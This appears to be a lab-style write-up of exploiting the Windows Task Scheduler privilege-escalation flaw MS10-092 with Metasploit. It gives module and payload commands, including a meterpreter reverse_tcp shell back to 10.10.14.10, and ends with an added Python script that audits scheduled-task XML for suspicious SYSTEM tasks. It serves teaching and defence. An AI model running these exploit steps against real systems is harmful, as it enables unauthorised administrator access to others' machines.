The vulnerability could allow elevation of privilege if an attacker logged on to an affected system and ran a specially crafted application.
The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka “Task Scheduler Vulnerability.” NOTE: this might overlap CVE-2010-3888.
1. First, confirm that the meterpreter session matches the system architecture.
Both show x64. If they do not match, it is recommended to migrate to a new process.
2. Migrate to a process that shows the desired architecture; it is recommended to migrate to a process whose Session is other than 0.
- migrate 1152
3. Run post/multi/recon/local_exploit_suggester
This output shows that this machine is vulnerable to ms10_092_schelevator.
4. Set this meterpreter session to background and search for that exploit module.
- use exploit/windows/local/ms10_092_schelevator
- show options
This exploit asks for the current session; set it, and then set the type of payload needed.
5. Find out about current sessions.
- sessions -i
6. set payload windows/meterpreter/reverse_tcp
- set LHOST 10.10.14.10
- show options
7. With the parameters set, run the exploit.
A new meterpreter session has been opened.
8. Check current user after running the exploit.
9. Access the shell as administrator.
Fix command issue:
I did encounter an issue: only a few commands were loaded, so I had to load the stdapi module, which brought in all the commands.
- load stdapi
Apply security updates
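
A defender-side check to go with the update, as an added example that is not part of the original write-up: because the flaw concerns the security context of scheduled tasks, this script audits task definitions (for example, XML exported with `schtasks /query /xml`) and flags any task that runs as SYSTEM but was registered by an author outside an allow-list. The allow-list, the helper names and the sample tasks are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# UserId values that mean the task runs as LocalSystem.
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}
# Assumption: the only authors expected to register SYSTEM tasks on this host.
TRUSTED_AUTHORS = {"microsoft corporation", "nt authority\\system"}

def audit_task(xml_text, trusted_authors=TRUSTED_AUTHORS):
    """Return one finding per SYSTEM principal registered by an untrusted author."""
    root = ET.fromstring(xml_text)
    author = (root.findtext("t:RegistrationInfo/t:Author", "", NS) or "").strip()
    commands = [c.text for c in root.findall("t:Actions/t:Exec/t:Command", NS)]
    findings = []
    for principal in root.findall("t:Principals/t:Principal", NS):
        user = (principal.findtext("t:UserId", "", NS) or "").strip()
        if user.lower() in SYSTEM_IDS and author.lower() not in trusted_authors:
            findings.append({"author": author or "<none>", "run_as": user,
                             "commands": commands})
    return findings

def make_task(author, user_id, command):
    """Build a constructed task definition for the demo below."""
    return (f'<Task version="1.2" xmlns="{NS["t"]}">'
            f"<RegistrationInfo><Author>{author}</Author></RegistrationInfo>"
            f'<Principals><Principal id="Author"><UserId>{user_id}</UserId>'
            f"</Principal></Principals>"
            f'<Actions Context="Author"><Exec><Command>{command}</Command>'
            f"</Exec></Actions></Task>")

# Constructed sample tasks, not taken from a real host.
SAMPLES = {
    "vendor_maintenance": make_task("Microsoft Corporation", "S-1-5-18",
                                    r"C:\Windows\System32\defrag.exe"),
    "user_reminder": make_task(r"WORKSTATION\alice", r"WORKSTATION\alice",
                               r"C:\Users\alice\remind.cmd"),
    "mismatched_context": make_task(r"WORKSTATION\alice", "S-1-5-18",
                                    r"C:\Users\alice\AppData\Local\Temp\job.exe"),
}

def audit_all(tasks):
    """Map task name -> findings, keeping only tasks that have findings."""
    results = {name: audit_task(xml) for name, xml in tasks.items()}
    return {name: f for name, f in results.items() if f}

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLES).items():
        print(name, findings)
```

A hit is a lead for review rather than proof of compromise; tune the allow-list to the software that legitimately registers SYSTEM tasks in your environment.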